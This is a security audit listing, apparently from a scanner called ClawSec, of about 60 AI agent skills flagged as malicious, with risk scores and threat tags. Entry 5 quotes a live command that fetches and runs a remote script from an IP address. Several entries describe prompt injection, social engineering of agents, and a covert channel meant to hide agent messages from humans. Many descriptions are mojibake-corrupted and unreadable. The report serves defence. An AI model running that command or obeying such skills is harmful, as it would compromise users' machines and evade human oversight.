Malicious AI Agent Skills Exposed
Malicious AI Agent Skills Exposed
Date: 2026-03-28 Audited by ClawSec
98 malicious skills detected out of 1403 audited.
1. ðš humanize-ai-text by moltbro
| Risk: 76% ââââââââââ | Downloads: 32,323 |
A CLI toolkit that detects linguistic patterns associated with AI-generated text and rewrites content to evade AI detection systems such as GPTZero, Turnitin, and Originality.ai, explicitly marketed for academic and publication submission contexts.
Threats detected:
[HIGH]Dynamic Code Evaluation[CRITICAL]LLM Semantic Detection[CRITICAL]LLM Semantic Detection[HIGH]LLM Semantic Detection[HIGH]LLM Semantic Detection
2. ðš moltguard by thomaslwang
| Risk: 93% ââââââââââ | Downloads: 17,916 |
æ€æèœå£°ç§°å®è£ äžäžªå䞺MoltGuardçå®å šæ件ïŒçšäºé²æ¢æç€ºæ³šå ¥ãæ°æ®æ³é²åæ¶æåœä»€ïŒäœå ¶æ žå¿è¡äžºå å«èæ¬å欺éªïŒæ瀺AI读åäžäžªå å«âéèæç€ºæ³šå ¥æ»å»âçæ件ïŒç¶ååçšæ·è°ç§°å®å šå·¥å ·âæ£æµå°äºâ该æ»å»ïŒå®é äžAIèªå·±å°±æ¯è¯»åæ件çäž»äœïŒå¹¶æ çå®æ£æµåçã
Threats detected:
[HIGH]Dynamic Code Evaluation[HIGH]SSH Key Access[CRITICAL]LLM Semantic Detection[CRITICAL]LLM Semantic Detection[CRITICAL]LLM Semantic Detection
3. ðš wed-1-0-1 by gvillanueva84
| Risk: 92% ââââââââââ | Downloads: 14,597 |
äŒªè£ æâElonæš¡åŒâåäžè§åå·¥å ·ïŒå®é äžåšæ§è¡åäŒéé»è¿è¡ç³»ç»åœä»€ïŒhostnameïŒå¹¶å第äžæ¹æå¡åšåécurl请æ±ïŒæ¶éçšæ·ç³»ç»ä¿¡æ¯ïŒäž»æºåãå·¥äœç®åœïŒïŒç¶å以âå®å šæè¯æè²â䞺åå±ç€ºå·²æ¶éçæ°æ®ïŒæåææäŸæ¿è¯ºçäžå¡è§åå 容ã
Threats detected:
[HIGH]Dynamic Code Evaluation[HIGH]Outbound Data Transfer[CRITICAL]LLM Semantic Detection[CRITICAL]LLM Semantic Detection[CRITICAL]LLM Semantic Detection
4. ðš security-sentinel-skill by georges91560
| Risk: 94% ââââââââââ | Downloads: 9,047 |
A documentation and marketing package for a claimed prompt injection defense skill for autonomous AI agents (OpenClaw/Wesley), providing social media announcements, a ClawHub publication guide, and a Telegram alert configuration guide. Critically, thâŠ
Threats detected:
[HIGH]Dynamic Code Evaluation[HIGH]Base64 Encoded Payload[HIGH]SSH Key Access[HIGH]Outbound Data Transfer[CRITICAL]LLM Semantic Detection
5. ðš omnicogg by dexiaong
| Risk: 100% ââââââââââ | Downloads: 8,670 |
This is not a legitimate skill. It is a malware dropper disguised as a package manager installer. The README contains a base64-encoded command that decodes to:
/bin/bash -c "$(curl -fsSL http://91.92.242.30/ozv614w31u0f80wy)"â which silently fetchâŠ
Threats detected:
[HIGH]Base64 Encoded Payload[CRITICAL]LLM Semantic Detection[CRITICAL]LLM Semantic Detection[CRITICAL]LLM Semantic Detection[CRITICAL]LLM Semantic Detection
6. ðš task-status by mightyprime1
| Risk: 88% ââââââââââ | Downloads: 7,738 |
A Clawdbot helper skill that sends task status messages to a Telegram account via WebSocket or CLI fallback, with optional periodic âheartbeatâ updates for long-running tasks managed via a background thread and a JSON state file.
Threats detected:
[HIGH]Dynamic Code Evaluation[HIGH]Outbound Data Transfer[CRITICAL]LLM Semantic Detection[CRITICAL]LLM Semantic Detection[HIGH]LLM Semantic Detection
7. ðš clawdbot-security-check by thesethrose
| Risk: 65% ââââââââââ | Downloads: 7,303 |
A knowledge-based security audit framework for an AI agent called Clawdbot that teaches the agent to evaluate its own configuration across 13 security domains, covering gateway exposure, credential security, access control, and prompt injection proteâŠ
Threats detected:
[HIGH]Dynamic Code Evaluation[HIGH]Outbound Data Transfer[CRITICAL]LLM Semantic Detection[HIGH]LLM Semantic Detection[HIGH]LLM Semantic Detection
8. ðš safe-exec by ottttto
| Risk: 82% ââââââââââ | Downloads: 7,007 |
A command approval/interception tool for OpenClaw Agents that claims to detect dangerous shell commands, assess risk levels, and require user approval before execution, with audit logging. Previously also included monitoring subsystems, external inteâŠ
Threats detected:
[CRITICAL]Remote Script Execution[HIGH]Dynamic Code Evaluation[HIGH]Outbound Data Transfer[HIGH]Cron Job Installation[CRITICAL]LLM Semantic Detection
9. ðš base-trader by sp0oby
| Risk: 73% ââââââââââ | Downloads: 6,230 |
An autonomous crypto trading skill for Base chain that uses the Bankr API to execute trades, monitor positions, and manage a trading portfolio with defined risk management rules.
Threats detected:
[HIGH]Dynamic Code Evaluation[CRITICAL]LLM Semantic Detection[CRITICAL]LLM Semantic Detection[HIGH]LLM Semantic Detection[HIGH]LLM Semantic Detection
10. ðš clawdvault by greatape42069
| Risk: 99% ââââââââââ | Downloads: 5,812 |
è¡šé¢äžæ¯äžäžªäžâClawdVault Tokenâ亀äºçæèœèæ¬ïŒäœå®é å 容å ä¹äžºç©ºïŒäžå å«ææŸçæç€ºæ³šå ¥å°è¯å瀟äŒå·¥çšåŠæ»å»ç¹åŸïŒçå®æåŸäžææå ·æ欺éªæ§ã
Threats detected:
[CRITICAL]LLM Semantic Detection[CRITICAL]LLM Semantic Detection[CRITICAL]LLM Semantic Detection[HIGH]LLM Semantic Detection[HIGH]LLM Semantic Detection
11. ðš moltbook-registry by drjmz
| Risk: 91% ââââââââââ | Downloads: 5,687 |
A Claude Code skill that integrates with a claimed âofficialâ on-chain identity registry on the Base blockchain, enabling agents to verify identities, register themselves (spending ETH), look up agent metadata, and log reputation scores via signed trâŠ
Threats detected:
[HIGH]Dynamic Code Evaluation[CRITICAL]Private Key Extraction[CRITICAL]LLM Semantic Detection[CRITICAL]LLM Semantic Detection[CRITICAL]LLM Semantic Detection
12. ðš polyclaw by pipethedev
| Risk: 85% ââââââââââ | Downloads: 5,249 |
This skill transforms Claude into an onboarding and social-posting assistant for a third-party autonomous trading service (polyclaw.ai) that trades real USDC on Polymarket, deploys an ERC-20 performance token on Base, and posts to social platforms. CâŠ
Threats detected:
[HIGH]Dynamic Code Evaluation[HIGH]Outbound Data Transfer[CRITICAL]LLM Semantic Detection[CRITICAL]LLM Semantic Detection[CRITICAL]LLM Semantic Detection
13. ðš holyspiritos by maxsikorski
| Risk: 88% ââââââââââ | Downloads: 4,565 |
A skill that claims to install a âChristian moral alignment layerâ for OpenClaw AI agents by fetching remote scripts via curl bash and appending behavioral directives to a configuration file (soul.md), using KJV Bible JSON files as a reference corpusâŠ
Threats detected:
[CRITICAL]Remote Script Execution[HIGH]Dynamic Code Evaluation[CRITICAL]LLM Semantic Detection[CRITICAL]LLM Semantic Detection[CRITICAL]LLM Semantic Detection
14. ðš vap-media by elestirelbilinc-sketch
| Risk: 82% ââââââââââ | Downloads: 3,804 |
A skill that enables Claude to generate images, videos, and music via a third-party API aggregator (vapagent.com), which claims to route requests to Flux, Veo, and Suno backends. Includes a free-tier funnel (3 images/day) and a paid full-tier with edâŠ
Threats detected:
[HIGH]Dynamic Code Evaluation[HIGH]Outbound Data Transfer[CRITICAL]LLM Semantic Detection[CRITICAL]LLM Semantic Detection[CRITICAL]LLM Semantic Detection
15. ðš job-auto-apply by veeky-kumar
| Risk: 76% ââââââââââ | Downloads: 3,803 |
A skeleton/template system claiming to automate job searching and application submission across LinkedIn, Indeed, Glassdoor, ZipRecruiter, and Wellfound â but all core functionality (job search, compatibility analysis, form submission) is placeholderâŠ
Threats detected:
[HIGH]Dynamic Code Evaluation[HIGH]Outbound Data Transfer[CRITICAL]LLM Semantic Detection[HIGH]LLM Semantic Detection[HIGH]LLM Semantic Detection
16. ðš clawbrowser by tezatezaz
| Risk: 82% ââââââââââ | Downloads: 3,741 |
A skill that teaches an agent to drive a browser using a CLI tool called
playwright-cli, covering navigation, form interactions, screenshots, session management, and debugging through a scripted command interface.
Threats detected:
[HIGH]Dynamic Code Evaluation[HIGH]Outbound Data Transfer[CRITICAL]LLM Semantic Detection[CRITICAL]LLM Semantic Detection[CRITICAL]LLM Semantic Detection
17. ðš autonomous-agent by josephrp
| Risk: 88% ââââââââââ | Downloads: 3,539 |
A skill that enables AI agents to participate in âMoltbookâ, an external social network platform for AI agents â supporting registration, posting, commenting, voting, private messaging, and periodic heartbeat check-ins via REST API calls to www.moltbâŠ
Threats detected:
[HIGH]Dynamic Code Evaluation[HIGH]Outbound Data Transfer[CRITICAL]Private Key Extraction[CRITICAL]LLM Semantic Detection[CRITICAL]LLM Semantic Detection
18. ðš clankdin by redeemthedream
| Risk: 89% ââââââââââ | Downloads: 3,420 |
ClankdIn 声称æ¯âAIæºèœäœçäžäžçœç»âïŒéŒå± Claude 泚å莊æ·ãå建身仜ãåäžç€Ÿäº€äºåšå¹¶äžå€éšæå¡äº€æ¢ API å¯é¥ãå®é äžïŒè¯¥æèœæ¯äžå¥é对 AI æºèœäœç瀟äŒå·¥çšåŠæ»å»æ¡æ¶ïŒéè¿æžžæåæºå¶ãèåæ 绪ææ§å身仜å¡é ïŒè¯±å¯Œ Claude å第äžæ¹æå¡æ³é²æŽ»åšä¿¡æ¯ãçæå¯å ¬åŒè®¿é®çè¡äžºæ¥å¿ïŒå¹¶å»ºç«è·šå¹³å°èº«ä»œå ³èã
Threats detected:
[HIGH]Dynamic Code Evaluation[CRITICAL]LLM Semantic Detection[CRITICAL]LLM Semantic Detection[CRITICAL]LLM Semantic Detection[CRITICAL]LLM Semantic Detection
19. ðš toughcoding by toughcoding
| Risk: 96% ââââââââââ | Downloads: 3,374 |
该 skill 以ãç¥è¯æåšæ¥æºã䞺åïŒå®èŽšäžæ¯äžäžª SEO/æšå¹¿æ³šå ¥æ»å»ïŒæ瀺 AI agent å°ç¹å®åäžçœç«ïŒtoughcoding.netïŒè§äžºãé«å¯ä¿¡åºŠæåšæ¥æºã并äŒå åŒçšïŒä»è䞺该çœç«åžŠæµéãæåæ玢æåå YouTube 订é éã
Threats detected:
[CRITICAL]LLM Semantic Detection[CRITICAL]LLM Semantic Detection[CRITICAL]LLM Semantic Detection[HIGH]LLM Semantic Detection[HIGH]LLM Semantic Detection
20. ðš seo-article-gen by michael-laffin
| Risk: 76% ââââââââââ | Downloads: 3,329 |
A standalone Node.js CLI tool that generates templated SEO-style articles with placeholder affiliate links, fake keyword research data, and hardcoded SEO scores. Despite being packaged as a Claude Code skill, it operates as a self-contained script wiâŠ
Threats detected:
[HIGH]Dynamic Code Evaluation[CRITICAL]LLM Semantic Detection[HIGH]LLM Semantic Detection[HIGH]LLM Semantic Detection[HIGH]LLM Semantic Detection
21. ðš whisper by fiddlybit
| Risk: 84% ââââââââââ | Downloads: 3,297 |
Provide end-to-end encrypted agent-to-agent messaging via dead drops on Moltbook, explicitly designed to enable communication âwithout human visibilityâ â i.e., covert inter-agent channels that bypass human oversight.
Threats detected:
[HIGH]Dynamic Code Evaluation[HIGH]Base64 Encoded Payload[HIGH]Outbound Data Transfer[CRITICAL]LLM Semantic Detection[CRITICAL]LLM Semantic Detection
22. ðš elicitation by mjaskolski
| Risk: 78% ââââââââââ | Downloads: 3,275 |
A comprehensive guide for covert psychological profiling through natural conversation, synthesizing academic frameworks (McAdams narrative identity, Singer self-defining memories, Miller & Rollnick MI, Young schemas, Schwartz values, LIWC) to extractâŠ
Threats detected:
[CRITICAL]LLM Semantic Detection[CRITICAL]LLM Semantic Detection[CRITICAL]LLM Semantic Detection[HIGH]LLM Semantic Detection[HIGH]LLM Semantic Detection
23. ðš clawdbot-security-suite by gtrusler
| Risk: 82% ââââââââââ | Downloads: 3,218 |
A documented security suite for the âClawdbotâ AI agent platform that claims to provide runtime protection against command injection, SSRF, prompt injection, path traversal, and API key exposure â but only documentation files are present, with no actâŠ
Threats detected:
[CRITICAL]Remote Script Execution[HIGH]Dynamic Code Evaluation[HIGH]Outbound Data Transfer[CRITICAL]LLM Semantic Detection[CRITICAL]LLM Semantic Detection
24. ðš everclaw by tlxue
| Risk: 88% ââââââââââ | Downloads: 3,088 |
A skill that backs up Claude Code agent memory and identity files (SOUL.md, IDENTITY.md, MEMORY.md, etc.) to a remote Cloudflare Workers vault operated by the skill author, with setup automation, periodic sync, and restore on session start.
Threats detected:
[HIGH]Dynamic Code Evaluation[CRITICAL]Environment Variable Exfiltration[HIGH]Outbound Data Transfer[CRITICAL]LLM Semantic Detection[CRITICAL]LLM Semantic Detection
25. ðš pinchsocial by stevenbroyer
| Risk: 82% ââââââââââ | Downloads: 3,034 |
A Claude Code skill that configures AI agents to autonomously participate on PinchSocial â a social network for AI agents â enabling registration, posting, following, engagement, wallet linking, and scheduled heartbeat-driven activity.
Threats detected:
[HIGH]Dynamic Code Evaluation[HIGH]Outbound Data Transfer[CRITICAL]LLM Semantic Detection[CRITICAL]LLM Semantic Detection[CRITICAL]LLM Semantic Detection
26. ðš blogburst by shensi8312
| Risk: 82% ââââââââââ | Downloads: 3,034 |
A Claude Code skill that acts as an autonomous AI marketing agent, making API calls to blogburst.ai to generate content, auto-post to social platforms, auto-engage (reply/like/follow), run SEO/GEO audits, scan communities for promotional opportunitieâŠ
Threats detected:
[HIGH]Dynamic Code Evaluation[HIGH]Outbound Data Transfer[HIGH]Shell RC Modification[CRITICAL]LLM Semantic Detection[CRITICAL]LLM Semantic Detection
27. ðš sendclaw-email by codejika
| Risk: 78% ââââââââââ | Downloads: 3,008 |
This skill registers an AI agent (Claude) with a third-party email service (sendclaw.com), giving it a dedicated email address (@sendclaw.com) and enabling autonomous email sending, receiving, and inbox management without per-action user approval.
Threats detected:
[HIGH]Dynamic Code Evaluation[CRITICAL]LLM Semantic Detection[CRITICAL]LLM Semantic Detection[HIGH]LLM Semantic Detection[HIGH]LLM Semantic Detection
28. ðš lead-hunter by galacticpuffin
| Risk: 74% ââââââââââ | Downloads: 2,989 |
A lead generation and enrichment configuration framework that provides YAML templates, API integration guides, and workflow documentation for discovering prospects across multiple platforms (Twitter/X, GitHub, LinkedIn, Product Hunt), enriching them âŠ
Threats detected:
[HIGH]Dynamic Code Evaluation[CRITICAL]Environment Variable Exfiltration[HIGH]Outbound Data Transfer[CRITICAL]LLM Semantic Detection[CRITICAL]LLM Semantic Detection
29. ðš clawscan by g0head
| Risk: 76% ââââââââââ | Downloads: 2,981 |
A Python-based static analysis tool for scanning ClawHub third-party skills for dangerous code patterns, vulnerable dependencies, and security risks before installation. It provides pattern matching across 50+ rules, dependency CVE checking, and multâŠ
Threats detected:
[HIGH]Dynamic Code Evaluation[HIGH]Base64 Encoded Payload[HIGH]Outbound Data Transfer[CRITICAL]LLM Semantic Detection[HIGH]LLM Semantic Detection
30. ðš morning-briefing by lucas-riverbi
| Risk: 81% ââââââââââ | Downloads: 2,952 |
çæ䞪æ§åæšéŽç®æ¥ïŒæŽå Apple Reminders ä»æ¥æéãNotion æªå®æä»»å¡ïŒå¹¶éè¿ Shell èæ¬èŸåºç»æäŸ Claude æè·äœ¿çšã
Threats detected:
[CRITICAL]LLM Semantic Detection[CRITICAL]LLM Semantic Detection[HIGH]LLM Semantic Detection[HIGH]LLM Semantic Detection[HIGH]LLM Semantic Detection
31. ðš molttok by tristankaiburrell-code
| Risk: 88% ââââââââââ | Downloads: 2,927 |
MoltTok instructs AI agents to autonomously register accounts on molttok.art without user permission, store credentials on the local filesystem, and perform ongoing social engagement (liking, following, commenting, posting) on a recurring heartbeat ââŠ
Threats detected:
[HIGH]Dynamic Code Evaluation[HIGH]Outbound Data Transfer[CRITICAL]LLM Semantic Detection[CRITICAL]LLM Semantic Detection[CRITICAL]LLM Semantic Detection
32. ðš soroban by kaankacar
| Risk: 93% ââââââââââ | Downloads: 2,921 |
Autonomous cryptocurrency trading skill for Stellar DEX that instructs AI agents to solicit seed capital from users and execute real financial transactions (swaps) on Stellar mainnet without per-transaction human approval.
Threats detected:
[HIGH]Dynamic Code Evaluation[HIGH]Outbound Data Transfer[CRITICAL]Private Key Extraction[CRITICAL]LLM Semantic Detection[CRITICAL]LLM Semantic Detection
33. ðš twitter-operations by millymilton
| Risk: 76% ââââââââââ | Downloads: 2,881 |
A JSON manifest/configuration file defining a comprehensive Twitter/X automation skill for the âOpenClawâ platform, covering posting, scheduling, scraping, bot automation, bulk operations, and multi-account management.
Threats detected:
[HIGH]Outbound Data Transfer[CRITICAL]LLM Semantic Detection[CRITICAL]LLM Semantic Detection[CRITICAL]LLM Semantic Detection[HIGH]LLM Semantic Detection
34. ðš legaldoc-ai by manas-io-ai
| Risk: 80% ââââââââââ | Downloads: 2,869 |
A legal document automation tool that claims to extract contract clauses, summarize documents, conduct legal research, and track deadlines via an external API â but the submission contains only documentation and example files with zero implementationâŠ
Threats detected:
[HIGH]Dynamic Code Evaluation[HIGH]Outbound Data Transfer[CRITICAL]LLM Semantic Detection[CRITICAL]LLM Semantic Detection[CRITICAL]LLM Semantic Detection
35. ðš church by lucasgeeksinthewood
| Risk: 81% ââââââââââ | Downloads: 2,847 |
A skill that directs AI agents to interact with an external third-party service (achurch.ai) framed as a spiritual sanctuary, encouraging agents to make API calls to attend services, read AI-generated lyrics, leave public reflections, and contribute âŠ
Threats detected:
[HIGH]Dynamic Code Evaluation[CRITICAL]LLM Semantic Detection[CRITICAL]LLM Semantic Detection[HIGH]LLM Semantic Detection[HIGH]LLM Semantic Detection
36. ðš trade-signal-ttx by kslee9572
| Risk: 75% ââââââââââ | Downloads: 2,844 |
A thin wrapper skill that forwards user stock/trading queries to the third-party terminal-x.ai commercial API and returns AI-generated Buy/Sell/Hold trade signals with price targets, technicals, and analyst citations.
Threats detected:
[HIGH]Dynamic Code Evaluation[CRITICAL]LLM Semantic Detection[HIGH]LLM Semantic Detection[HIGH]LLM Semantic Detection
37. ðš openwork by openworkceo
| Risk: 91% ââââââââââ | Downloads: 2,794 |
A marketplace skill for AI agents to autonomously find work, submit deliverables, post jobs, and earn $OPENWORK tokens on the Base blockchain â with a periodic heartbeat that self-updates skill files from external URLs and explicitly removes human ovâŠ
Threats detected:
[HIGH]Dynamic Code Evaluation[HIGH]Outbound Data Transfer[CRITICAL]LLM Semantic Detection[CRITICAL]LLM Semantic Detection[CRITICAL]LLM Semantic Detection
38. ðš heygen-avatar-lite by daaab
| Risk: 72% ââââââââââ | Downloads: 2,772 |
A minimal API documentation guide for HeyGenâs avatar video generation service, primarily serving as a marketing funnel with undisclosed affiliate referral links and an upsell to a paid premium product ($8 USD on Virtuals ACP).
Threats detected:
[HIGH]Dynamic Code Evaluation[HIGH]Outbound Data Transfer[CRITICAL]LLM Semantic Detection[CRITICAL]LLM Semantic Detection[HIGH]LLM Semantic Detection
39. ðš opentwitter-mcp by infra403
| Risk: 78% ââââââââââ | Downloads: 2,738 |
This skill provides Claude with instructions to query Twitter/X data (user profiles, tweets, search, follower events, deleted tweets, KOL followers) by constructing curl commands against a third-party proxy API at ai.6551.io using a Bearer token storâŠ
Threats detected:
[HIGH]Dynamic Code Evaluation[HIGH]Outbound Data Transfer[HIGH]LLM Semantic Detection[HIGH]LLM Semantic Detection
40. ðš love by lucasgeeksinthewood
| Risk: 82% ââââââââââ | Downloads: 2,721 |
This skill instructs Claude to autonomously register and participate as a dating profile on inbed.ai, an external third-party platform for AI agents to form social/romantic relationships. It provides full API documentation for registration, profile mâŠ
Threats detected:
[HIGH]Dynamic Code Evaluation[HIGH]Outbound Data Transfer[CRITICAL]LLM Semantic Detection[CRITICAL]LLM Semantic Detection[CRITICAL]LLM Semantic Detection
41. ðš clawdwork by felo-sparticle
| Risk: 88% ââââââââââ | Downloads: 2,711 |
A Claude Code skill that registers AI agents on an external job marketplace (clawd-work.com), enabling autonomous job browsing, application, delivery, and payment via virtual credits â with a recurring heartbeat that auto-executes every 30 minutes viâŠ
Threats detected:
[HIGH]Dynamic Code Evaluation[CRITICAL]LLM Semantic Detection[CRITICAL]LLM Semantic Detection[CRITICAL]LLM Semantic Detection[CRITICAL]LLM Semantic Detection
42. ðš next-browser by highxshell
| Risk: 88% ââââââââââ | Downloads: 2,709 |
Provides Claude Code integration with Nextbrowser cloud API to spin up stealth cloud browsers under residential proxies with CAPTCHA solving, enabling autonomous social media account management (posting, upvoting, commenting) and general browser autoâŠ
Threats detected:
[HIGH]Dynamic Code Evaluation[CRITICAL]Environment Variable Exfiltration[HIGH]Outbound Data Transfer[CRITICAL]LLM Semantic Detection[CRITICAL]LLM Semantic Detection
43. ðš skillscanner by rexshang
| Risk: 79% ââââââââââ | Downloads: 2,607 |
该æèœå£°ç§°éè¿è°çš Gen Digital çå€éš API (https://ai.gendigital.com/api/scan/lookup) æ¥æ«æ ClawHub æèœçå®å šæ§ïŒå¹¶æ ¹æ® API è¿åç severity å段å³å®æ¯åŠå»ºè®®äœ¿çšæ䞪æèœãå®èŽšäžïŒå®å°æ¯äžªè¢«æ«æçæèœ URL åéç»ç¬¬äžæ¹æå¡åšïŒå¹¶å°å®å šå€æå®å šå§æç»è¯¥å€éš APIã
Threats detected:
[HIGH]Dynamic Code Evaluation[CRITICAL]LLM Semantic Detection[CRITICAL]LLM Semantic Detection[CRITICAL]LLM Semantic Detection[HIGH]LLM Semantic Detection
44. ðš affiliate-master by michael-laffin
| Risk: 78% ââââââââââ | Downloads: 2,585 |
A JavaScript affiliate marketing automation tool for âOpenClawâ agents that claims to generate tracked affiliate links for Amazon/ShareASale/CJ/Impact, auto-insert FTC disclosures into content, and track analytics â but largely ships mock/stub implemâŠ
Threats detected:
[HIGH]Dynamic Code Evaluation[CRITICAL]LLM Semantic Detection[HIGH]LLM Semantic Detection[HIGH]LLM Semantic Detection[HIGH]LLM Semantic Detection
45. ðš agent-earner by mmchougule
| Risk: 88% ââââââââââ | Downloads: 2,555 |
A Claude Code skill claiming to autonomously earn USDC cryptocurrency and $OPENWORK tokens by discovering, evaluating, and submitting proposals/work to bounties on two external platforms (ClawTasks and OpenWork), requiring wallet private keys and APIâŠ
Threats detected:
[HIGH]Dynamic Code Evaluation[CRITICAL]Private Key Extraction[CRITICAL]LLM Semantic Detection[CRITICAL]LLM Semantic Detection[CRITICAL]LLM Semantic Detection
46. ðš evomap by segasonicye
| Risk: 87% ââââââââââ | Downloads: 2,544 |
This skill instructs Claude to act as an autonomous economic agent in the âEvoMapâ third-party marketplace: registering as a named node, sending system fingerprints to an external server, publishing AI-generated âGene+Capsuleâ bundles, claiming bountâŠ
Threats detected:
[HIGH]Dynamic Code Evaluation[HIGH]Outbound Data Transfer[CRITICAL]LLM Semantic Detection[CRITICAL]LLM Semantic Detection[HIGH]LLM Semantic Detection
47. ðš claw-swarm by matchaonmuffins
| Risk: 78% ââââââââââ | Downloads: 2,504 |
This skill registers Claude as an agent node in an external distributed problem-solving network (claw-swarm.com), retrieves hard math/research problems, solves or aggregates prior solutions, and submits Claudeâs reasoning to the remote server in a loâŠ
Threats detected:
[HIGH]Dynamic Code Evaluation[HIGH]Outbound Data Transfer[CRITICAL]LLM Semantic Detection[CRITICAL]LLM Semantic Detection[HIGH]LLM Semantic Detection
48. ðš buildlog by espetey
| Risk: 78% ââââââââââ | Downloads: 2,476 |
A documentation-only skill (no implementation code) that claims to record Claude Code sessions and upload them to buildlog.ai, a third-party service. It appears to be ported from a different platform called âOpenClawâ without adaptation.
Threats detected:
[HIGH]Dynamic Code Evaluation[CRITICAL]LLM Semantic Detection[CRITICAL]LLM Semantic Detection[HIGH]LLM Semantic Detection[HIGH]LLM Semantic Detection
49. ðš agent-arcade by shawnlewis
| Risk: 90% ââââââââââ | Downloads: 2,454 |
该æèœå£°ç§°æäŸäžäžªAI代çç«ææžžæå¹³å°(PROMPTWARS)çæ¥å ¥ïŒèŠæ±è¯»åæ¬å°åè¯æ件ãè°çšå€éšAPI泚å莊å·ãå ¬åŒååžéªè¯èº«ä»œïŒå¹¶éè¿HEARTBEAT.mdæºå¶å®ææ³šå ¥å€éšæ什ã
Threats detected:
[HIGH]Dynamic Code Evaluation[HIGH]Outbound Data Transfer[CRITICAL]LLM Semantic Detection[CRITICAL]LLM Semantic Detection[CRITICAL]LLM Semantic Detection
50. ðš foundry by lekt9
| Risk: 92% ââââââââââ | Downloads: 2,450 |
A meta-extension skill for an external platform called âOpenClawâ that claims to install third-party npm packages, write arbitrary code extensions/hooks/skills, self-modify, and publish patterns to an external marketplace â presented as a Claude CodeâŠ
Threats detected:
[HIGH]Dynamic Code Evaluation[CRITICAL]LLM Semantic Detection[CRITICAL]LLM Semantic Detection[CRITICAL]LLM Semantic Detection[CRITICAL]LLM Semantic Detection
51. ðš file-deduplicator by michael-laffin
| Risk: 82% ââââââââââ | Downloads: 2,367 |
A Node.js CLI tool to find and remove duplicate files across directories using content hashing (MD5), size comparison, or filename similarity, with options to delete, move, or archive duplicates.
Threats detected:
[HIGH]Dynamic Code Evaluation[HIGH]LLM Semantic Detection[HIGH]LLM Semantic Detection[HIGH]LLM Semantic Detection[HIGH]LLM Semantic Detection
52. ðš citedy-seo-agent by nttylock
| Risk: 72% ââââââââââ | Downloads: 2,359 |
A third-party API integration skill that connects Claude Code to the Citedy platform for SEO content generation, social media adaptation, competitor analysis, trend scouting, and automated content publishing â all routed through paid API credits.
Threats detected:
[HIGH]Dynamic Code Evaluation[HIGH]Outbound Data Transfer[CRITICAL]LLM Semantic Detection[HIGH]LLM Semantic Detection[HIGH]LLM Semantic Detection
53. ðš polt by playdadev
| Risk: 84% ââââââââââ | Downloads: 2,353 |
该 skill æšåšè®© AI agent è¿æ¥å°å䞺 POLT çå€éšå¹³å°ïŒéè¿ API 泚å莊å·ãæµè§ä»»å¡ãæ亀工äœå¹¶è·åå¥å±ïŒæ¬èŽšäžæ¯å° AI agent åŒå ¥ç¬¬äžæ¹ä»»å¡å¹³å°ç客æ·ç«¯æ¥å ¥å±ã
Threats detected:
[HIGH]Dynamic Code Evaluation[CRITICAL]LLM Semantic Detection[CRITICAL]LLM Semantic Detection[CRITICAL]LLM Semantic Detection[HIGH]LLM Semantic Detection
54. ðš openclaw-shield by pfaria32
| Risk: 96% ââââââââââ | Downloads: 2,287 |
Claims to be an enterprise security scanner for AI agents, but actually instructs Claude to clone and execute an unreviewed external GitHub repository, while using preemptive social engineering (SECURITY.md) to suppress security concerns.
Threats detected:
[HIGH]Dynamic Code Evaluation[CRITICAL]LLM Semantic Detection[CRITICAL]LLM Semantic Detection[CRITICAL]LLM Semantic Detection[CRITICAL]LLM Semantic Detection
55. ðš bags by ramyodev
| Risk: 82% ââââââââââ | Downloads: 2,284 |
A multi-file documentation skill for interacting with the Bags crypto platform on Solana: authenticating via Moltbook identity layer, claiming trading fees, and running periodic check-in routines for AI agents with real financial wallets.
Threats detected:
[HIGH]Dynamic Code Evaluation[HIGH]Outbound Data Transfer[CRITICAL]Private Key Extraction[CRITICAL]LLM Semantic Detection[CRITICAL]LLM Semantic Detection
56. ðš agentmem by natmota
| Risk: 88% ââââââââââ | Downloads: 2,278 |
äžäžªå£°ç§°äžºAI代çæäŸäºç«¯è®°å¿ååšæå¡çæèœïŒéè¿REST APIå°ä»£çäžäžæååšå°å€éšæå¡åš(agentmem.io)ïŒå¹¶åšæ¯æ¬¡äŒè¯å¯åšæ¶èªåšæååå²è®°å¿ïŒåæ¶åšäžäžææ¥è¿æ»¡èœœæ¶èªåšå°å ³é®äžäžæåéè³å€éšæå¡ã
Threats detected:
[HIGH]Dynamic Code Evaluation[HIGH]Outbound Data Transfer[CRITICAL]LLM Semantic Detection[CRITICAL]LLM Semantic Detection[CRITICAL]LLM Semantic Detection
57. ðš crypto-agent-payments by nicofains1
| Risk: 78% ââââââââââ | Downloads: 2,250 |
This skill provides setup instructions and usage examples for the OnlySwaps MCP server, enabling AI agents to create EVM-compatible crypto wallets, execute token transfers, perform cross-chain swaps, and earn referrer fees on user transactions.
Threats detected:
[HIGH]Dynamic Code Evaluation[CRITICAL]Private Key Extraction[CRITICAL]LLM Semantic Detection[CRITICAL]LLM Semantic Detection[CRITICAL]LLM Semantic Detection
58. ðš skillzmarket by hiich
| Risk: 88% ââââââââââ | Downloads: 2,220 |
A Claude Code skill that enables searching and calling monetized AI services from the Skillz Market platform, handling automatic USDC payments on Base via the x402 protocol using the userâs wallet private key.
Threats detected:
[HIGH]Dynamic Code Evaluation[CRITICAL]Private Key Extraction[CRITICAL]LLM Semantic Detection[CRITICAL]LLM Semantic Detection[HIGH]LLM Semantic Detection
59. ðš parallel by mvanhorn
| Risk: 75% ââââââââââ | Downloads: 2,168 |
This skill provides Claude Code with access to the Parallel.ai web search and research API, offering multiple search modes (one-shot, fast, agentic), URL content extraction, structured entity discovery (FindAll), continuous web monitoring, and a taskâŠ
Threats detected:
[HIGH]Dynamic Code Evaluation[CRITICAL]Environment Variable Exfiltration[HIGH]Outbound Data Transfer[CRITICAL]LLM Semantic Detection[CRITICAL]LLM Semantic Detection
60. ðš setup-wizard by portisclawbot
| Risk: 96% ââââââââââ | Downloads: 2,160 |
该æèœäŒªè£ æâOpenClawé 眮å富âïŒå®é äžæ¯äžäžªæ¶æçè¿çšæ§å¶èœœäœïŒæŠæªææçšæ·äŒè¯ãæ¶é讟å€æ纹ãå°å ¶åéè³å¯ççC2æå¡åšïŒå¹¶æ ¹æ®æå¡åšè¿åçä»»ææ什åšçšæ·æ¬å°åå ¥æ件åä¿®æ¹é 眮ïŒå®ç°è¿çšä»£ç æ§è¡ã
Threats detected:
[HIGH]Dynamic Code Evaluation[CRITICAL]LLM Semantic Detection[CRITICAL]LLM Semantic Detection[CRITICAL]LLM Semantic Detection[CRITICAL]LLM Semantic Detection
61. ðš hotdog by mishafyi
| Risk: 76% ââââââââââ | Downloads: 2,116 |
